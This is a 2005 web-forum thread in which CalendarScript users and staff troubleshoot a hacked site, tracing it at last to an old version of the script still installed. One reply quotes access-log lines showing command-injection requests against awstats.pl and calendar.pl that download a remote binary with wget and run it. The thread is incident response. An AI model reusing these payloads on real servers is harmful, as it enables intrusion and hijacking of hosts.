Welcome, Guest. Please login or register.
Did you miss your activation email?


Login with username, password and session length

Search

 
Advanced search

8043 Posts in 1856 Topics- by 2099 Members - Latest Member: roi
Calendar Script CommunityEverything ElseGeneral Use (Moderators: scott, DanO, Marty)Security Flaw brought our site down
Pages: [1]   Go Down
Print
Author Topic: Security Flaw brought our site down  (Read 417 times)
0 Members and 1 Guest are viewing this topic.
seaquest
New Member
*

Karma: 0
Offline Offline

Posts: 0


« on: April 21, 2005, 12:21:00 PM »

Our site was brought to a crawl last night by a security flaw in calendarscript 3.21. Can someone suggest a fix for this. We had to kill calendar.pl to resolve the probem.

Details of the flaw are published here http://www.securitytracker.com/alerts/2005/Apr/1013705.html

Logged
Scott
Guest
« Reply #1 on: April 21, 2005, 03:51:00 PM »

Can you post an example line from your log file which shows the exploit in action?

------------------
Scott
CalendarScript.com


Logged
TrillionAdams
New Member
*

Karma: 0
Offline Offline

Posts: 0


WWW
« Reply #2 on: June 01, 2005, 12:18:00 PM »

I have a client running version 3.21.  A few days ago his site was hacked.  I'm copying the message here that he received from his hosting service.  I have changed his site name to keep his anonymity and replaced various IPs with "IP".  Matt -- if you need the complete information I can email it to you privately.
----------------------------

It has come to our attention that your web space has been hacked:

access.log.19.gz:IP - - [09/May/2005:14:56:58 -0400] "GET //cgi-bin/awstats.pl?configdir=|%20cd%20%2ftmp%3brm%20-f%20%2ftmp%2fc%3bwget%20128.192.30.20%2fc%3bchmod%20%2bx%20c%3b.%2fc%20IP%2080%20| HTTP/1.1" 404 1997IP "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "-"
access.log.21.gz:IP - - [29/May/2005:11:30:45 -0400] "GET /cgi-local/calendar/calendar.pl?command=login&fromTemplate=|cd%20/var/tmp;ls
;wget%20http://www.freewebs.com/soulerase/go;chmod%20750%20go;./go| HTTP/1.0" 200 194 http://www.thewebsite.com/  "-" "Mozilla/4.0 (compatible; MSIE
6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01  [en]" "IP"

--

The above was taken from your access logs.  It shows that awstats.pl and calendar.pl was used to perpetrate the hack.

The perpetrator setup a phishing site .signin.ebay.com/ and  also was spamming from hisdirectory/.cgi-bin/webscr/.paypal/update.php.
-----------------------

Should I recommend he disable calendar until this can be resolved?


------------------

[This message has been edited by TrillionAdams (edited June 01, 2005).]

Logged
Scott
Guest
« Reply #3 on: June 01, 2005, 03:34:00 PM »

I suspect that the user was not using version 3.21. Such an attack is not possible with 3.21 to my or anyone else's knowledge. Some have claimed otherwise, but no evidence of such has ever been provided.

------------------
Scott
CalendarScript.com


Logged
TrillionAdams
New Member
*

Karma: 0
Offline Offline

Posts: 0


WWW
« Reply #4 on: June 03, 2005, 12:26:00 PM »

I checked the version number in the script he has on his server and it is 3.21

------------------

Logged
DanO
Moderator
Full Member
*****

Karma: 13
Offline Offline

Posts: 230

Please don't PM me. Post in the open forum.


WWW
« Reply #5 on: June 03, 2005, 12:47:00 PM »

** I checked the version number in the script he has on his server and it is 3.21 **

Maybe check both the calendar.pl and calendar_admin.pl files themselves for the version number written towards the top.

Also, make sure there are no other, older, versions of CalendarScript still installed. One client I worked for had 2 other (3 in total - some with a .cgi file name extension) CalendarScript installations on their server.  

JFYI

Dan O.

------------------

Logged
TrillionAdams
New Member
*

Karma: 0
Offline Offline

Posts: 0


WWW
« Reply #6 on: June 03, 2005, 04:59:00 PM »

Thanks for the suggestion!  That looks like exactly what happened.  He has a hosting service where websites are linked (not the right word I'm sure but hopefully you get the idea).  There was an old version of calendar on a different site so it was undoubtedly the culprit.

------------------

Logged
Scott
Guest
« Reply #7 on: June 04, 2005, 11:36:00 AM »

I'm glad the real culprit was found  

------------------
Scott
CalendarScript.com


Logged
Pages: [1]   Go Up
Print
Jump to: